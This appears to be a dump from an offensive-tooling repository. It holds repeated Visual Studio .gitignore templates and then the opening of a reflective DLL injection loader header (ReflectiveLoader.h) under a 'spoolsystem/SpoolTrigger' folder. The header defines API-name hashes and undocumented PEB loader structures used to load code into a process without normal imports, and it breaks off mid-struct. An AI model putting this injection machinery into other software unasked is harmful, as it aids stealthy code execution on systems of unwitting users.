46 | # Build Results of an ATL Project
47 | [Dd]ebugPS/
48 | [Rr]eleasePS/
49 | dlldata.c
50 |
51 | # Benchmark Results
52 | BenchmarkDotNet.Artifacts/
53 |
54 | # .NET Core
55 | project.lock.json
56 | project.fragment.lock.json
57 | artifacts/
58 |
59 | # StyleCop
60 | StyleCopReport.xml
61 |
62 | # Files built by Visual Studio
63 | *_i.c
64 | *_p.c
65 | *_h.h
66 | *.ilk
67 | *.meta
68 | *.obj
69 | *.iobj
70 | *.pch
71 | *.pdb
72 | *.ipdb
73 | *.pgc
74 | *.pgd
75 | *.rsp
76 | *.sbr
77 | *.tlb
78 | *.tli
79 | *.tlh
80 | *.tmp
81 | *.tmp_proj
82 | *_wpftmp.csproj
83 | *.log
84 | *.vspscc
85 | *.vssscc
86 | .builds
87 | *.pidb
88 | *.svclog
89 | *.scc
90 |
91 | # Chutzpah Test files
92 | _Chutzpah*
93 |
94 | # Visual C++ cache files
95 | ipch/
96 | *.aps
97 | *.ncb
98 | *.opendb
99 | *.opensdf
100 | *.sdf
101 | *.cachefile
102 | *.VC.db
103 | *.VC.VC.opendb
104 |
105 | # Visual Studio profiler
106 | *.psess
107 | *.vsp
108 | *.vspx
109 | *.sap
110 |
111 | # Visual Studio Trace Files
112 | *.e2e
113 |
114 | # TFS 2012 Local Workspace
115 | $tf/
116 |
117 | # Guidance Automation Toolkit
118 | *.gpState
119 |
120 | # ReSharper is a .NET coding add-in
121 | _ReSharper*/
122 | *.[Rr]e[Ss]harper
123 | *.DotSettings.user
124 |
125 | # JustCode is a .NET coding add-in
126 | .JustCode
127 |
128 | # TeamCity is a build add-in
129 | _TeamCity*
130 |
131 | # DotCover is a Code Coverage Tool
132 | *.dotCover
133 |
134 | # AxoCover is a Code Coverage Tool
135 | .axoCover/*
136 | !.axoCover/settings.json
137 |
138 | # Visual Studio code coverage results
139 | *.coverage
140 | *.coveragexml
141 |
142 | # NCrunch
143 | _NCrunch_*
144 | .*crunch*.local.xml
145 | nCrunchTemp_*
146 |
147 | # MightyMoose
148 | *.mm.*
149 | AutoTest.Net/
150 |
151 | # Web workbench (sass)
152 | .sass-cache/
153 |
154 | # Installshield output folder
155 | [Ee]xpress/
156 |
157 | # DocProject is a documentation generator add-in
158 | DocProject/buildhelp/
159 | DocProject/Help/*.HxT
160 | DocProject/Help/*.HxC
161 | DocProject/Help/*.hhc
162 | DocProject/Help/*.hhk
163 | DocProject/Help/*.hhp
164 | DocProject/Help/Html2
165 | DocProject/Help/html
166 |
167 | # Click-Once directory
168 | publish/
169 |
170 | # Publish Web Output
171 | *.[Pp]ublish.xml
172 | *.azurePubxml
173 | # Note: Comment the next line if you want to checkin your web deploy settings,
174 | # but database connection strings (with potential passwords) will be unencrypted
175 | *.pubxml
176 | *.publishproj
177 |
178 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
179 | # checkin your Azure Web App publish settings, but sensitive information contained
180 | # in these scripts will be unencrypted
181 | PublishScripts/
182 |
183 | # NuGet Packages
184 | *.nupkg
185 | # The packages folder can be ignored because of Package Restore
186 | **/[Pp]ackages/*
187 | # except build/, which is used as an MSBuild target.
188 | !**/[Pp]ackages/build/
189 | # Uncomment if necessary however generally it will be regenerated when needed
190 | #!**/[Pp]ackages/repositories.config
191 | # NuGet v3's project.json files produces more ignorable files
192 | *.nuget.props
193 | *.nuget.targets
194 |
195 | # Microsoft Azure Build Output
196 | csx/
197 | *.build.csdef
198 |
199 | # Microsoft Azure Emulator
200 | ecf/
201 | rcf/
202 |
203 | # Windows Store app package directories and files
204 | AppPackages/
205 | BundleArtifacts/
206 | Package.StoreAssociation.xml
207 | _pkginfo.txt
208 | *.appx
209 |
210 | # Visual Studio cache files
211 | # files ending in .cache can be ignored
212 | *.[Cc]ache
213 | # but keep track of directories ending in .cache
214 | !?*.[Cc]ache/
215 |
216 | # Others
217 | ClientBin/
218 | ~$*
219 | *~
220 | *.dbmdl
221 | *.dbproj.schemaview
222 | *.jfm
223 | *.pfx
224 | *.publishsettings
225 | orleans.codegen.cs
226 |
227 | # Including strong name files can present a security risk
228 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
229 | #*.snk
230 |
231 | # Since there are multiple workflows, uncomment next line to ignore bower_components
232 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
233 | #bower_components/
234 |
235 | # RIA/Silverlight projects
236 | Generated_Code/
237 |
238 | # Backup & report files from converting an old project file
239 | # to a newer Visual Studio version. Backup files are not needed,
240 | # because we have git ;-)
241 | _UpgradeReport_Files/
242 | Backup*/
243 | UpgradeLog*.XML
244 | UpgradeLog*.htm
245 | ServiceFabricBackup/
246 | *.rptproj.bak
247 |
248 | # SQL Server files
249 | *.mdf
250 | *.ldf
251 | *.ndf
252 |
253 | # Business Intelligence projects
254 | *.rdl.data
255 | *.bim.layout
256 | *.bim_*.settings
257 | *.rptproj.rsuser
258 | *- Backup*.rdl
259 |
260 | # Microsoft Fakes
261 | FakesAssemblies/
262 |
263 | # GhostDoc plugin setting file
264 | *.GhostDoc.xml
265 |
266 | # Node.js Tools for Visual Studio
267 | .ntvs_analysis.dat
268 | node_modules/
269 |
270 | # Visual Studio 6 build log
271 | *.plg
272 |
273 | # Visual Studio 6 workspace options file
274 | *.opt
275 |
276 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
277 | *.vbw
278 |
279 | # Visual Studio LightSwitch build output
280 | **/*.HTMLClient/GeneratedArtifacts
281 | **/*.DesktopClient/GeneratedArtifacts
282 | **/*.DesktopClient/ModelManifest.xml
283 | **/*.Server/GeneratedArtifacts
284 | **/*.Server/ModelManifest.xml
285 | _Pvt_Extensions
286 |
287 | # Paket dependency manager
288 | .paket/paket.exe
289 | paket-files/
290 |
291 | # FAKE - F# Make
292 | .fake/
293 |
294 | # JetBrains Rider
295 | .idea/
296 | *.sln.iml
297 |
298 | # CodeRush personal settings
299 | .cr/personal
300 |
301 | # Python Tools for Visual Studio (PTVS)
302 | __pycache__/
303 | *.pyc
304 |
305 | # Cake - Uncomment if you are using it
306 | # tools/**
307 | # !tools/packages.config
308 |
309 | # Tabs Studio
310 | *.tss
311 |
312 | # Telerik's JustMock configuration file
313 | *.jmconfig
314 |
315 | # BizTalk build output
316 | *.btp.cs
317 | *.btm.cs
318 | *.odx.cs
319 | *.xsd.cs
320 |
321 | # OpenCover UI analysis results
322 | OpenCover/
323 |
324 | # Azure Stream Analytics local run output
325 | ASALocalRun/
326 |
327 | # MSBuild Binary and Structured Log
328 | *.binlog
329 |
330 | # NVidia Nsight GPU debugger configuration file
331 | *.nvuser
332 |
333 | # MFractors (Xamarin productivity tool) working folder
334 | .mfractor/
335 |
336 | # Local History for Visual Studio
337 | .localhistory/
338 |
339 | # BeatPulse healthcheck temp database
340 | healthchecksdb
341 |
342 | .DS_Store
343 |
--------------------------------------------------------------------------------
/Tools/Squeak/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ##
4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
5 |
6 | # User-specific files
7 | *.rsuser
8 | *.suo
9 | *.user
10 | *.userosscache
11 | *.sln.docstates
12 |
13 | # User-specific files (MonoDevelop/Xamarin Studio)
14 | *.userprefs
15 |
16 | # Build results
17 | [Dd]ebug/
18 | [Dd]ebugPublic/
19 | [Rr]elease/
20 | [Rr]eleases/
21 | x64/
22 | x86/
23 | [Aa][Rr][Mm]/
24 | [Aa][Rr][Mm]64/
25 | bld/
26 | [Bb]in/
27 | [Oo]bj/
28 | [Ll]og/
29 |
30 | # Visual Studio 2015/2017 cache/options directory
31 | .vs/
32 | # Uncomment if you have tasks that create the project's static files in wwwroot
33 | #wwwroot/
34 |
35 | # Visual Studio 2017 auto generated files
36 | Generated\ Files/
37 |
38 | # MSTest test Results
39 | [Tt]est[Rr]esult*/
40 | [Bb]uild[Ll]og.*
41 |
42 | # NUNIT
43 | *.VisualState.xml
44 | TestResult.xml
45 |
46 | # Build Results of an ATL Project
47 | [Dd]ebugPS/
48 | [Rr]eleasePS/
49 | dlldata.c
50 |
51 | # Benchmark Results
52 | BenchmarkDotNet.Artifacts/
53 |
54 | # .NET Core
55 | project.lock.json
56 | project.fragment.lock.json
57 | artifacts/
58 |
59 | # StyleCop
60 | StyleCopReport.xml
61 |
62 | # Files built by Visual Studio
63 | *_i.c
64 | *_p.c
65 | *_h.h
66 | *.ilk
67 | *.meta
68 | *.obj
69 | *.iobj
70 | *.pch
71 | *.pdb
72 | *.ipdb
73 | *.pgc
74 | *.pgd
75 | *.rsp
76 | *.sbr
77 | *.tlb
78 | *.tli
79 | *.tlh
80 | *.tmp
81 | *.tmp_proj
82 | *_wpftmp.csproj
83 | *.log
84 | *.vspscc
85 | *.vssscc
86 | .builds
87 | *.pidb
88 | *.svclog
89 | *.scc
90 |
91 | # Chutzpah Test files
92 | _Chutzpah*
93 |
94 | # Visual C++ cache files
95 | ipch/
96 | *.aps
97 | *.ncb
98 | *.opendb
99 | *.opensdf
100 | *.sdf
101 | *.cachefile
102 | *.VC.db
103 | *.VC.VC.opendb
104 |
105 | # Visual Studio profiler
106 | *.psess
107 | *.vsp
108 | *.vspx
109 | *.sap
110 |
111 | # Visual Studio Trace Files
112 | *.e2e
113 |
114 | # TFS 2012 Local Workspace
115 | $tf/
116 |
117 | # Guidance Automation Toolkit
118 | *.gpState
119 |
120 | # ReSharper is a .NET coding add-in
121 | _ReSharper*/
122 | *.[Rr]e[Ss]harper
123 | *.DotSettings.user
124 |
125 | # JustCode is a .NET coding add-in
126 | .JustCode
127 |
128 | # TeamCity is a build add-in
129 | _TeamCity*
130 |
131 | # DotCover is a Code Coverage Tool
132 | *.dotCover
133 |
134 | # AxoCover is a Code Coverage Tool
135 | .axoCover/*
136 | !.axoCover/settings.json
137 |
138 | # Visual Studio code coverage results
139 | *.coverage
140 | *.coveragexml
141 |
142 | # NCrunch
143 | _NCrunch_*
144 | .*crunch*.local.xml
145 | nCrunchTemp_*
146 |
147 | # MightyMoose
148 | *.mm.*
149 | AutoTest.Net/
150 |
151 | # Web workbench (sass)
152 | .sass-cache/
153 |
154 | # Installshield output folder
155 | [Ee]xpress/
156 |
157 | # DocProject is a documentation generator add-in
158 | DocProject/buildhelp/
159 | DocProject/Help/*.HxT
160 | DocProject/Help/*.HxC
161 | DocProject/Help/*.hhc
162 | DocProject/Help/*.hhk
163 | DocProject/Help/*.hhp
164 | DocProject/Help/Html2
165 | DocProject/Help/html
166 |
167 | # Click-Once directory
168 | publish/
169 |
170 | # Publish Web Output
171 | *.[Pp]ublish.xml
172 | *.azurePubxml
173 | # Note: Comment the next line if you want to checkin your web deploy settings,
174 | # but database connection strings (with potential passwords) will be unencrypted
175 | *.pubxml
176 | *.publishproj
177 |
178 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
179 | # checkin your Azure Web App publish settings, but sensitive information contained
180 | # in these scripts will be unencrypted
181 | PublishScripts/
182 |
183 | # NuGet Packages
184 | *.nupkg
185 | # The packages folder can be ignored because of Package Restore
186 | **/[Pp]ackages/*
187 | # except build/, which is used as an MSBuild target.
188 | !**/[Pp]ackages/build/
189 | # Uncomment if necessary however generally it will be regenerated when needed
190 | #!**/[Pp]ackages/repositories.config
191 | # NuGet v3's project.json files produces more ignorable files
192 | *.nuget.props
193 | *.nuget.targets
194 |
195 | # Microsoft Azure Build Output
196 | csx/
197 | *.build.csdef
198 |
199 | # Microsoft Azure Emulator
200 | ecf/
201 | rcf/
202 |
203 | # Windows Store app package directories and files
204 | AppPackages/
205 | BundleArtifacts/
206 | Package.StoreAssociation.xml
207 | _pkginfo.txt
208 | *.appx
209 |
210 | # Visual Studio cache files
211 | # files ending in .cache can be ignored
212 | *.[Cc]ache
213 | # but keep track of directories ending in .cache
214 | !?*.[Cc]ache/
215 |
216 | # Others
217 | ClientBin/
218 | ~$*
219 | *~
220 | *.dbmdl
221 | *.dbproj.schemaview
222 | *.jfm
223 | *.pfx
224 | *.publishsettings
225 | orleans.codegen.cs
226 |
227 | # Including strong name files can present a security risk
228 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
229 | #*.snk
230 |
231 | # Since there are multiple workflows, uncomment next line to ignore bower_components
232 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
233 | #bower_components/
234 |
235 | # RIA/Silverlight projects
236 | Generated_Code/
237 |
238 | # Backup & report files from converting an old project file
239 | # to a newer Visual Studio version. Backup files are not needed,
240 | # because we have git ;-)
241 | _UpgradeReport_Files/
242 | Backup*/
243 | UpgradeLog*.XML
244 | UpgradeLog*.htm
245 | ServiceFabricBackup/
246 | *.rptproj.bak
247 |
248 | # SQL Server files
249 | *.mdf
250 | *.ldf
251 | *.ndf
252 |
253 | # Business Intelligence projects
254 | *.rdl.data
255 | *.bim.layout
256 | *.bim_*.settings
257 | *.rptproj.rsuser
258 | *- Backup*.rdl
259 |
260 | # Microsoft Fakes
261 | FakesAssemblies/
262 |
263 | # GhostDoc plugin setting file
264 | *.GhostDoc.xml
265 |
266 | # Node.js Tools for Visual Studio
267 | .ntvs_analysis.dat
268 | node_modules/
269 |
270 | # Visual Studio 6 build log
271 | *.plg
272 |
273 | # Visual Studio 6 workspace options file
274 | *.opt
275 |
276 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
277 | *.vbw
278 |
279 | # Visual Studio LightSwitch build output
280 | **/*.HTMLClient/GeneratedArtifacts
281 | **/*.DesktopClient/GeneratedArtifacts
282 | **/*.DesktopClient/ModelManifest.xml
283 | **/*.Server/GeneratedArtifacts
284 | **/*.Server/ModelManifest.xml
285 | _Pvt_Extensions
286 |
287 | # Paket dependency manager
288 | .paket/paket.exe
289 | paket-files/
290 |
291 | # FAKE - F# Make
292 | .fake/
293 |
294 | # JetBrains Rider
295 | .idea/
296 | *.sln.iml
297 |
298 | # CodeRush personal settings
299 | .cr/personal
300 |
301 | # Python Tools for Visual Studio (PTVS)
302 | __pycache__/
303 | *.pyc
304 |
305 | # Cake - Uncomment if you are using it
306 | # tools/**
307 | # !tools/packages.config
308 |
309 | # Tabs Studio
310 | *.tss
311 |
312 | # Telerik's JustMock configuration file
313 | *.jmconfig
314 |
315 | # BizTalk build output
316 | *.btp.cs
317 | *.btm.cs
318 | *.odx.cs
319 | *.xsd.cs
320 |
321 | # OpenCover UI analysis results
322 | OpenCover/
323 |
324 | # Azure Stream Analytics local run output
325 | ASALocalRun/
326 |
327 | # MSBuild Binary and Structured Log
328 | *.binlog
329 |
330 | # NVidia Nsight GPU debugger configuration file
331 | *.nvuser
332 |
333 | # MFractors (Xamarin productivity tool) working folder
334 | .mfractor/
335 |
336 | # Local History for Visual Studio
337 | .localhistory/
338 |
339 | # BeatPulse healthcheck temp database
340 | healthchecksdb
341 |
342 | .DS_Store
343 |
--------------------------------------------------------------------------------
/Tools/spoolsystem/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ##
4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
5 |
6 | # User-specific files
7 | *.rsuser
8 | *.suo
9 | *.user
10 | *.userosscache
11 | *.sln.docstates
12 |
13 | # User-specific files (MonoDevelop/Xamarin Studio)
14 | *.userprefs
15 |
16 | # Build results
17 | [Dd]ebug/
18 | [Dd]ebugPublic/
19 | [Rr]elease/
20 | [Rr]eleases/
21 | x64/
22 | x86/
23 | [Aa][Rr][Mm]/
24 | [Aa][Rr][Mm]64/
25 | bld/
26 | [Bb]in/
27 | [Oo]bj/
28 | [Ll]og/
29 |
30 | # Visual Studio 2015/2017 cache/options directory
31 | .vs/
32 | # Uncomment if you have tasks that create the project's static files in wwwroot
33 | #wwwroot/
34 |
35 | # Visual Studio 2017 auto generated files
36 | Generated\ Files/
37 |
38 | # MSTest test Results
39 | [Tt]est[Rr]esult*/
40 | [Bb]uild[Ll]og.*
41 |
42 | # NUNIT
43 | *.VisualState.xml
44 | TestResult.xml
45 |
46 | # Build Results of an ATL Project
47 | [Dd]ebugPS/
48 | [Rr]eleasePS/
49 | dlldata.c
50 |
51 | # Benchmark Results
52 | BenchmarkDotNet.Artifacts/
53 |
54 | # .NET Core
55 | project.lock.json
56 | project.fragment.lock.json
57 | artifacts/
58 |
59 | # StyleCop
60 | StyleCopReport.xml
61 |
62 | # Files built by Visual Studio
63 | *_i.c
64 | *_p.c
65 | *_h.h
66 | *.ilk
67 | *.meta
68 | *.obj
69 | *.iobj
70 | *.pch
71 | *.pdb
72 | *.ipdb
73 | *.pgc
74 | *.pgd
75 | *.rsp
76 | *.sbr
77 | *.tlb
78 | *.tli
79 | *.tlh
80 | *.tmp
81 | *.tmp_proj
82 | *_wpftmp.csproj
83 | *.log
84 | *.vspscc
85 | *.vssscc
86 | .builds
87 | *.pidb
88 | *.svclog
89 | *.scc
90 |
91 | # Chutzpah Test files
92 | _Chutzpah*
93 |
94 | # Visual C++ cache files
95 | ipch/
96 | *.aps
97 | *.ncb
98 | *.opendb
99 | *.opensdf
100 | *.sdf
101 | *.cachefile
102 | *.VC.db
103 | *.VC.VC.opendb
104 |
105 | # Visual Studio profiler
106 | *.psess
107 | *.vsp
108 | *.vspx
109 | *.sap
110 |
111 | # Visual Studio Trace Files
112 | *.e2e
113 |
114 | # TFS 2012 Local Workspace
115 | $tf/
116 |
117 | # Guidance Automation Toolkit
118 | *.gpState
119 |
120 | # ReSharper is a .NET coding add-in
121 | _ReSharper*/
122 | *.[Rr]e[Ss]harper
123 | *.DotSettings.user
124 |
125 | # JustCode is a .NET coding add-in
126 | .JustCode
127 |
128 | # TeamCity is a build add-in
129 | _TeamCity*
130 |
131 | # DotCover is a Code Coverage Tool
132 | *.dotCover
133 |
134 | # AxoCover is a Code Coverage Tool
135 | .axoCover/*
136 | !.axoCover/settings.json
137 |
138 | # Visual Studio code coverage results
139 | *.coverage
140 | *.coveragexml
141 |
142 | # NCrunch
143 | _NCrunch_*
144 | .*crunch*.local.xml
145 | nCrunchTemp_*
146 |
147 | # MightyMoose
148 | *.mm.*
149 | AutoTest.Net/
150 |
151 | # Web workbench (sass)
152 | .sass-cache/
153 |
154 | # Installshield output folder
155 | [Ee]xpress/
156 |
157 | # DocProject is a documentation generator add-in
158 | DocProject/buildhelp/
159 | DocProject/Help/*.HxT
160 | DocProject/Help/*.HxC
161 | DocProject/Help/*.hhc
162 | DocProject/Help/*.hhk
163 | DocProject/Help/*.hhp
164 | DocProject/Help/Html2
165 | DocProject/Help/html
166 |
167 | # Click-Once directory
168 | publish/
169 |
170 | # Publish Web Output
171 | *.[Pp]ublish.xml
172 | *.azurePubxml
173 | # Note: Comment the next line if you want to checkin your web deploy settings,
174 | # but database connection strings (with potential passwords) will be unencrypted
175 | *.pubxml
176 | *.publishproj
177 |
178 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
179 | # checkin your Azure Web App publish settings, but sensitive information contained
180 | # in these scripts will be unencrypted
181 | PublishScripts/
182 |
183 | # NuGet Packages
184 | *.nupkg
185 | # The packages folder can be ignored because of Package Restore
186 | **/[Pp]ackages/*
187 | # except build/, which is used as an MSBuild target.
188 | !**/[Pp]ackages/build/
189 | # Uncomment if necessary however generally it will be regenerated when needed
190 | #!**/[Pp]ackages/repositories.config
191 | # NuGet v3's project.json files produces more ignorable files
192 | *.nuget.props
193 | *.nuget.targets
194 |
195 | # Microsoft Azure Build Output
196 | csx/
197 | *.build.csdef
198 |
199 | # Microsoft Azure Emulator
200 | ecf/
201 | rcf/
202 |
203 | # Windows Store app package directories and files
204 | AppPackages/
205 | BundleArtifacts/
206 | Package.StoreAssociation.xml
207 | _pkginfo.txt
208 | *.appx
209 |
210 | # Visual Studio cache files
211 | # files ending in .cache can be ignored
212 | *.[Cc]ache
213 | # but keep track of directories ending in .cache
214 | !?*.[Cc]ache/
215 |
216 | # Others
217 | ClientBin/
218 | ~$*
219 | *~
220 | *.dbmdl
221 | *.dbproj.schemaview
222 | *.jfm
223 | *.pfx
224 | *.publishsettings
225 | orleans.codegen.cs
226 |
227 | # Including strong name files can present a security risk
228 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
229 | #*.snk
230 |
231 | # Since there are multiple workflows, uncomment next line to ignore bower_components
232 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
233 | #bower_components/
234 |
235 | # RIA/Silverlight projects
236 | Generated_Code/
237 |
238 | # Backup & report files from converting an old project file
239 | # to a newer Visual Studio version. Backup files are not needed,
240 | # because we have git ;-)
241 | _UpgradeReport_Files/
242 | Backup*/
243 | UpgradeLog*.XML
244 | UpgradeLog*.htm
245 | ServiceFabricBackup/
246 | *.rptproj.bak
247 |
248 | # SQL Server files
249 | *.mdf
250 | *.ldf
251 | *.ndf
252 |
253 | # Business Intelligence projects
254 | *.rdl.data
255 | *.bim.layout
256 | *.bim_*.settings
257 | *.rptproj.rsuser
258 | *- Backup*.rdl
259 |
260 | # Microsoft Fakes
261 | FakesAssemblies/
262 |
263 | # GhostDoc plugin setting file
264 | *.GhostDoc.xml
265 |
266 | # Node.js Tools for Visual Studio
267 | .ntvs_analysis.dat
268 | node_modules/
269 |
270 | # Visual Studio 6 build log
271 | *.plg
272 |
273 | # Visual Studio 6 workspace options file
274 | *.opt
275 |
276 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
277 | *.vbw
278 |
279 | # Visual Studio LightSwitch build output
280 | **/*.HTMLClient/GeneratedArtifacts
281 | **/*.DesktopClient/GeneratedArtifacts
282 | **/*.DesktopClient/ModelManifest.xml
283 | **/*.Server/GeneratedArtifacts
284 | **/*.Server/ModelManifest.xml
285 | _Pvt_Extensions
286 |
287 | # Paket dependency manager
288 | .paket/paket.exe
289 | paket-files/
290 |
291 | # FAKE - F# Make
292 | .fake/
293 |
294 | # JetBrains Rider
295 | .idea/
296 | *.sln.iml
297 |
298 | # CodeRush personal settings
299 | .cr/personal
300 |
301 | # Python Tools for Visual Studio (PTVS)
302 | __pycache__/
303 | *.pyc
304 |
305 | # Cake - Uncomment if you are using it
306 | # tools/**
307 | # !tools/packages.config
308 |
309 | # Tabs Studio
310 | *.tss
311 |
312 | # Telerik's JustMock configuration file
313 | *.jmconfig
314 |
315 | # BizTalk build output
316 | *.btp.cs
317 | *.btm.cs
318 | *.odx.cs
319 | *.xsd.cs
320 |
321 | # OpenCover UI analysis results
322 | OpenCover/
323 |
324 | # Azure Stream Analytics local run output
325 | ASALocalRun/
326 |
327 | # MSBuild Binary and Structured Log
328 | *.binlog
329 |
330 | # NVidia Nsight GPU debugger configuration file
331 | *.nvuser
332 |
333 | # MFractors (Xamarin productivity tool) working folder
334 | .mfractor/
335 |
336 | # Local History for Visual Studio
337 | .localhistory/
338 |
339 | # BeatPulse healthcheck temp database
340 | healthchecksdb
341 |
342 | .DS_Store
343 |
--------------------------------------------------------------------------------
/Tools/spoolsystem/SpoolTrigger/ReflectiveLoader.h:
--------------------------------------------------------------------------------
1 | //===============================================================================================//
2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
3 | // All rights reserved.
4 | //
5 | // Redistribution and use in source and binary forms, with or without modification, are permitted
6 | // provided that the following conditions are met:
7 | //
8 | // * Redistributions of source code must retain the above copyright notice, this list of
9 | // conditions and the following disclaimer.
10 | //
11 | // * Redistributions in binary form must reproduce the above copyright notice, this list of
12 | // conditions and the following disclaimer in the documentation and/or other materials provided
13 | // with the distribution.
14 | //
15 | // * Neither the name of Harmony Security nor the names of its contributors may be used to
16 | // endorse or promote products derived from this software without specific prior written permission.
17 | //
18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
26 | // POSSIBILITY OF SUCH DAMAGE.
27 | //===============================================================================================//
28 | #ifndef _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H
29 | #define _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H
30 | //===============================================================================================//
31 | #define WIN32_LEAN_AND_MEAN
32 | #include
33 | #include
34 |
35 | #include "ReflectiveDLLInjection.h"
36 |
37 | typedef HMODULE(WINAPI* LOADLIBRARYA)(LPCSTR);
38 | typedef FARPROC(WINAPI* GETPROCADDRESS)(HMODULE, LPCSTR);
39 | typedef LPVOID(WINAPI* VIRTUALALLOC)(LPVOID, SIZE_T, DWORD, DWORD);
40 | typedef DWORD(NTAPI* NTFLUSHINSTRUCTIONCACHE)(HANDLE, PVOID, ULONG);
41 |
42 | #define KERNEL32DLL_HASH 0x6A4ABC5B
43 | #define NTDLLDLL_HASH 0x3CFA685D
44 |
45 | #define LOADLIBRARYA_HASH 0xEC0E4E8E
46 | #define GETPROCADDRESS_HASH 0x7C0DFCAA
47 | #define VIRTUALALLOC_HASH 0x91AFCA54
48 | #define NTFLUSHINSTRUCTIONCACHE_HASH 0x534C0AB8
49 |
50 | #define IMAGE_REL_BASED_ARM_MOV32A 5
51 | #define IMAGE_REL_BASED_ARM_MOV32T 7
52 |
53 | #define ARM_MOV_MASK (DWORD)(0xFBF08000)
54 | #define ARM_MOV_MASK2 (DWORD)(0xFBF08F00)
55 | #define ARM_MOVW 0xF2400000
56 | #define ARM_MOVT 0xF2C00000
57 |
58 | #define HASH_KEY 13
59 | //===============================================================================================//
60 | #pragma intrinsic( _rotr )
61 |
62 | __forceinline DWORD ror(DWORD d)
63 | {
64 | return _rotr(d, HASH_KEY);
65 | }
66 |
67 | __forceinline DWORD hash(char* c)
68 | {
69 | register DWORD h = 0;
70 | do
71 | {
72 | h = ror(h);
73 | h += *c;
74 | } while (*++c);
75 |
76 | return h;
77 | }
78 | //===============================================================================================//
79 | typedef struct _UNICODE_STR
80 | {
81 | USHORT Length;
82 | USHORT MaximumLength;
83 | PWSTR pBuffer;
84 | } UNICODE_STR, * PUNICODE_STR;
85 |
86 | // WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY
87 | //__declspec( align(8) )
88 | typedef struct _LDR_DATA_TABLE_ENTRY
89 | {
90 | //LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry.
91 | LIST_ENTRY InMemoryOrderModuleList;
92 | LIST_ENTRY InInitializationOrderModuleList;
93 | PVOID DllBase;
94 | PVOID EntryPoint;
95 | ULONG SizeOfImage;
96 | UNICODE_STR FullDllName;
97 | UNICODE_STR BaseDllName;
98 | ULONG Flags;
99 | SHORT LoadCount;
100 | SHORT TlsIndex;
101 | LIST_ENTRY HashTableEntry;
102 | ULONG TimeDateStamp;
103 | } LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY;
104 |
105 | // WinDbg> dt -v ntdll!_PEB_LDR_DATA
106 | typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes
107 | {
108 | DWORD dwLength;
109 | DWORD dwInitialized;
110 | LPVOID lpSsHandle;
111 | LIST_ENTRY InLoadOrderModuleList;
112 | LIST_ENTRY InMemoryOrderModuleList;
113 | LIST_ENTRY InInitializationOrderModuleList;
114 | LPVOID lpEntryInProgress;
115 | } PEB_LDR_DATA, * PPEB_LDR_DATA;
116 |
117 | // WinDbg> dt -v ntdll!_PEB_FREE_BLOCK
118 | typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes
119 | {
120 | struct _PEB_FREE_BLOCK* pNext;
121 | DWORD dwSize;
122 | } PEB_FREE_BLOCK, * PPEB_FREE_BLOCK;
123 |
124 | // struct _PEB is defined in Winternl.h but it is incomplete
125 | // WinDbg> dt -v ntdll!_PEB
126 | typedef struct __PEB // 65 elements, 0x210 bytes
127 | {
128 | BYTE bInheritedAddressSpace;
129 | BYTE bReadImageFileExecOptions;
130 | BYTE bBeingDebugged;
131 | BYTE bSpareBool;
132 | LPVOID lpMutant;
133 | LPVOID lpImageBaseAddress;
134 | PPEB_LDR_DATA pLdr;
135 | LPVOID lpProcessParameters;
136 | LPVOID lpSubSystemData;
137 | LPVOID lpProcessHeap;
138 | PRTL_CRITICAL_SECTION pFastPebLock;
139 | LPVOID lpFastPebLockRoutine;
140 | LPVOID lpFastPebUnlockRoutine;
141 | DWORD dwEnvironmentUpdateCount;
142 | LPVOID lpKernelCallbackTable;
143 | DWORD dwSystemReserved;
144 | DWORD dwAtlThunkSListPtr32;
145 | PPEB_FREE_BLOCK pFreeList;
146 | DWORD dwTlsExpansionCounter;
147 | LPVOID lpTlsBitmap;
148 | DWORD dwTlsBitmapBits[2];
149 | LPVOID lpReadOnlySharedMemoryBase;
150 | LPVOID lpReadOnlySharedMemoryHeap;
151 | LPVOID lpReadOnlyStaticServerData;
152 | LPVOID lpAnsiCodePageData;
153 | LPVOID lpOemCodePageData;
